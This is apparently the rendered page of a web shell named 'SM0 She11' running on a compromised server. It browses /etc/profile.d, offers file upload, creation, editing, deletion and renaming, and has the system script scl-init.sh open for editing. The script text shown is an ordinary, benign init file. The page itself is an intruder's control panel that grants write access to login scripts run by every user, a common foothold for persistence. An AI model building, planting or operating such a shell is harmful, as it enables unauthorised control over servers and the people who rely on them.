SM0 She11
Path:
/
/
etc
/
profile.d
Full Path (server): /etc/profile.d
Create Fil3
Upl04d Fil3
📄 bash_history.sh
[E]
[D]
[R]
📄 bash_timestamps.sh
[E]
[D]
[R]
📄 colorgrep.csh
[E]
[D]
[R]
📄 colorgrep.sh
[E]
[D]
[R]
📄 colorls.csh
[E]
[D]
[R]
📄 colorls.sh
[E]
[D]
[R]
📄 colorsysstat.csh
[E]
[D]
[R]
📄 colorsysstat.sh
[E]
[D]
[R]
📄 colorxzgrep.csh
[E]
[D]
[R]
📄 colorxzgrep.sh
[E]
[D]
[R]
📄 colorzgrep.csh
[E]
[D]
[R]
📄 colorzgrep.sh
[E]
[D]
[R]
📄 composer.sh
[E]
[D]
[R]
📄 cpanel-user-commands.sh
[E]
[D]
[R]
📄 csh.local
[E]
[D]
[R]
📄 debuginfod.csh
[E]
[D]
[R]
📄 debuginfod.sh
[E]
[D]
[R]
📄 diablo_alt_ruby.sh
[E]
[D]
[R]
📄 gawk.csh
[E]
[D]
[R]
📄 gawk.sh
[E]
[D]
[R]
📄 lang.csh
[E]
[D]
[R]
📄 lang.sh
[E]
[D]
[R]
📄 less.csh
[E]
[D]
[R]
📄 less.sh
[E]
[D]
[R]
📄 locallib.csh
[E]
[D]
[R]
📄 locallib.sh
[E]
[D]
[R]
📄 modules.csh
[E]
[D]
[R]
📄 modules.sh
[E]
[D]
[R]
📄 prompt.sh
[E]
[D]
[R]
📄 puppet-agent.csh
[E]
[D]
[R]
📄 puppet-agent.sh
[E]
[D]
[R]
📄 scl-init.csh
[E]
[D]
[R]
📄 scl-init.sh
[E]
[D]
[R]
📄 sh.local
[E]
[D]
[R]
📄 vim.csh
[E]
[D]
[R]
📄 vim.sh
[E]
[D]
[R]
📄 which2.csh
[E]
[D]
[R]
📄 which2.sh
[E]
[D]
[R]
Editing: scl-init.sh
scl() { if [ "$1" = "load" -o "$1" = "unload" ]; then # It is possible that function module is not declared in time of this # declaration so eval is used instead of direct calling of function module eval "module $@" else /usr/bin/scl "$@" fi } shell=`/bin/basename \`/bin/ps -p $$ -ocomm=\`` [ "$shell" = "bash" ] && export -f scl # export -f works only in bash MODULESHOME=/usr/share/Modules export MODULESHOME if [ "${MODULEPATH:-}" = "" ]; then MODULEPATH=`sed -n 's/[ #].*$//; /./H; $ { x; s/^\n//; s/\n/:/g; p; }' ${MODULESHOME}/init/.modulespath` fi MODULEPATH=/etc/scl/modulefiles:$MODULEPATH export MODULEPATH
Save